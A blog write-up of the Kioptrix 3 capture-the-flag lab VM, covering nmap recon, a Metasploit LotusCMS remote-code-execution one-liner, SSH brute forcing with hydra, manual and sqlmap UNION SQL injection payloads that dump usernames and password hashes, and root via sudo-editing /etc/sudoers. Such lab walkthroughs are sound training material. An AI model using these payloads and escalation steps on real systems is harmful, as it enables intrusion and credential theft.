root@V3dedBlog:~#
CTF

Kioptrix 3 writeup

Introduction

In this writeup I will continue Kioptrix series made by loneferret. Supposedly, there are multiple working exploits! How many can we find? Let’s see… Kioptrix 3 here I come!


Scanning and enumeration

Start a simple ARP scan with netdiscover to reveal target IP:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
 root@EdgeOfNight:~# netdiscover

 Currently scanning: 192.168.46.0/16   |   Screen View: Unique Hosts                                                                                                                                              
                                                                                                                                                                                                                  
 12 Captured ARP Req/Rep packets, from 9 hosts.   Total size: 720                                                                                                                                                 
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.1.11     [REDACTED]  	      2       120  Intel Corporate                                                                                                                                                
 192.168.1.15     08:00:27:08:00:ba   1        60  PCS Systemtechnik GmbH                                                                                                                                         
 192.168.1.12     [REDACTED]  	      1        60  Unknown vendor                                                                                                                                                 
 192.168.1.18     [REDACTED] 	      1        60  Apple, Inc.                                                                                                                                                    
 192.168.1.1      [REDACTED] 	      3       180  Unknown vendor                                                                                                                                           
 192.168.1.10     [REDACTED]          1        60  Unknown vendor                                                                                                                                                 
 192.168.1.20     [REDACTED]          1        60  Unknown vendor                                                                                                                                                 
 192.168.1.19     [REDACTED]          1        60  LG Innotek                                                                                                                                                     
 192.168.1.23     [REDACTED]          1        60  Unknown vendor     

Kioptrix3 has been assigned an IP of 192.168.1.15. For the sake of simplicity I’ll add the IP into /etc/hosts file for easier navigation later on. Do this using echo "192.168.1.15 kioptrix3.com >> /etc/hosts". This allows us to reference the machine as kioptrix3.com instead of 192.168.1.15.

!!! Make sure you do not overwrite your hosts file by inputting only one “>” !!!

My next step is a simple nmap portscan to detect open ports & running services.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
root@EdgeOfNight:~# nmap kioptrix3.com -A -T5 

Starting Nmap 7.50 ( https://nmap.org ) at 2017-10-21 13:22 CDT
Nmap scan report for kioptrix3.com (192.168.1.15)
Host is up (0.00021s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_  2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
MAC Address: 08:00:27:08:00:BA (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.21 ms kioptrix3.com (192.168.1.15)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.65 seconds

HTTP (80) and SSH (80) are both open. I wonder what does the webpage look like?

Cool. Clicking Login shows:

and clicking here redirects to a gallery:


Exploitation

Wait, really? Why was the recon so fast? No dirbuster, nikto, spidering? There are still many possible reconnaissance steps I could do, however to keep my writeup short I’ll focus on (hopefully) two main exploitation methods via LotusCMS and the gallery.

- Shell: LotusCMS

Fortunately enough, I encountered LotusCMS vulnerability once already and therefore getting a reverse shell was easy. LotusCMS is seeded with various vulnerabilites such as an RCE or an LFI. More can be found by querying searchsploit:

1
2
3
4
5
6
7
8
root@EdgeOfNight:~# searchsploit LotusCMS
------------------------------------------------------------------- ----------------------------------
 Exploit Title                                                     |  Path
                                                                   | (/usr/share/exploitdb/platforms/)
--------------------------------------------------------------------- --------------------------------
LotusCMS 3.0 - 'eval()' Remote Command Execution (Metasploit)      | php/remote/18565.rb
LotusCMS 3.0.3 - Multiple Vulnerabilities                          | php/webapps/16982.txt
------------------------------------------------------------------- ----------------------------------

Look! A metasploit RCE module. I usually avoid metasploit modules (and you should too), however I’ll use it just once for simplicity. msfconsole -x "use exploit/multi/http/lcms_php_exec; set URI /; set RHOST kioptrix3.com;run" yields a www-data shell.

msfconsole -x combines all commands into one

After that just view /home/ directory which shows 2 users - dreg and loneferret, fire up hydra and brute both of their SSH accounts! Users done. Sorry for not going into much detail when describing the steps! I find this way of getting an user rather stupid, which led to my quick explanation. If you despise using msfconsole, there is a tool on github which can do the same thing.

Visit the previously mentioned webpage. Inside Libgoat Press Room gallery allows sorting of photos by IDs which possibly opens up an SQL injection attack.

Unfortunately explaining the whole idea behind these injections would take ages. I recommend either SqlMap (check below) or learning manual injecting before reading the rest. So, do you see the URL? Changing id=1 to id=' causes a query error.

Tadaa! SQL Injection is possible! Time to dump database contents for passwords & usernames :).

Start out with kioptrix3.com/gallery/gallery.php?id=1 UNION SELECT 1,2,3,4,5,6# to find out how many injectable columns the database has (ORDER BY testing could be used as well).

We are able to see columns 2 and 3. Now we can substitute these numbers with SQL commands like @@version or database() - kioptrix3.com/gallery/gallery.php?id=1 UNION SELECT 1,@@version,database(),4,5,6#:

Dump all tables within our database() output - kioptrix3.com/gallery/gallery.php?id=1 UNION SELECT 1,table_name,NULL,4,5,6 FROM information_schema.tables WHERE table_schema = 'gallery'#:

Knowing the table names, choose an interesting one and dump its columns - kioptrix3.com/gallery/gallery.php?id=1 UNION SELECT 1,column_name,NULL,4,5,6 FROM information_schema.columns WHERE table_name = 'dev_accounts'#:

Result shows us 3 columns of interest:

Great! That’s exactly what we want. All that remains is one last command which will present us with the sweet credentials - kioptrix3.com/gallery/gallery.php?id=1 UNION SELECT 1,CONCAT(username,';',id,';',password),NULL,4,5,6 FROM dev_accounts:

The CONCAT() function just connects all 3 column contents into one statement with a semicolon (;) as a delimeter. Ultimately, you can use SqlMap which automates the attack.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
root@EdgeOfNight:~# sqlmap -u kioptrix3.com/gallery/gallery.php?id=1 -T dev_accounts --dump

---CUT CUT CUT---

Database: gallery
Table: dev_accounts
[2 entries]
+----+------------+----------------------------------+
| id | username   | password                         |
+----+------------+----------------------------------+
| 1  | dreg       | 0d3eccfb887aabd50f243b3f155c0f85 |
| 2  | loneferret | 5badcaf789d3d1d09794d8f021f40f0e |
+----+------------+----------------------------------+

---CUT CUT CUT---

Both hashes being non-salted MD5s, I decide to crack them. You could use a tool like hashcat or johntheripper, but I’ll stick to a simple online rainbow tables cracker.

Doing some experimenting I find out that the passwords can be used for SSH login. dreg has a limited shell and therefore loneferret’s account will be used instead.

Boom. Time for some privilege escalation!


Privilege escalation

Snooping around for some time I discover that loneferret can use sudo combined with ht (hex editor).

1
2
3
4
loneferret@Kioptrix3:~$ sudo -l
User loneferret may run the following commands on the host:
    (root) NOPASSWD: !/usr/bin/su
    (root) NOPASSWD: /usr/local/bin/ht

sudo ht effectively allows us to edit any file on the system. There are many ways of escalation from such misconfiguration (for example editing public ssh keys for root, changing passwd file or editing sudoers file). I’ll do the third one. Before editing the sudoers file make sure to export TERM so we can use the graphical component of our command - loneferret@Kioptrix3:~$ export TERM=xterm. Once done, open up the ht editor.

Press F3 to prompt an input window which asks us for a file to open - in our case /etc/sudoers.

Edit the file so that we can use sudo without limitations.

When done, sudo su root and the box is rooted! Go and get that root flag!


Conclusion

Fun box with a lot of small twists. I don’t think I found every vulnerability, but 2 is better than none! Compared to the other boxes in the series, this one was in my opinion the hardest. Enjoyed it non the less! If you have any questions feel free to leave a comment down below or contact me.

~V3